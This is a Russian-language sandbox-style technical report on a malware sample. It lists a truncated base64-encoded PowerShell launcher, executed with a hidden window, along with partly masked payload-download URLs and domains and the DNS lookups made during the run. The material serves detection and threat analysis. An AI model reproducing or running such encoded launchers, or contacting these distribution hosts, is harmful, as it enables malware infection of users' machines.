Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABUADUAaQByADIAMgB3AD0AKAAnAEcAMgA0AGUANgBoACcAKwAnADUAJwApADsAJgAoACcAbgBlAHcALQBpAHQAZQAnACsAJwBtACcAKQAgACQARQBOAFYAOgB0AEUAbQBwAFwATwBGAGYAaQBDAGUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AHkAcABlAC...
- 'co####enceroom.ge':80
- 'xi##isk.com':80
- http://id###isoft.pt/istore/uyg0iy068972/
- http://www.id###isoft.pt/istore/uyg0iy068972/
- http://ci###ehoje.pt/wp-includes/mDobpkdtbyht707/
- DNS ASK id###isoft.pt
- DNS ASK di####lumesh.tech
- DNS ASK ci###ehoje.pt
- DNS ASK co####enceroom.ge
- DNS ASK xi##isk.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABUADUAaQByADIAMgB3AD0AKAAnAEcAMgA0AGUANgBoACcAKwAnADUAJwApADsAJgAoACcAbgBlAHcALQBpAHQAZQAnACsAJwBtACcAKQAgACQARQBOAFYAOgB0AEUAbQBwAFwATwBGAGYAaQBDAGUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AHkAcABlAC...' (со скрытым окном)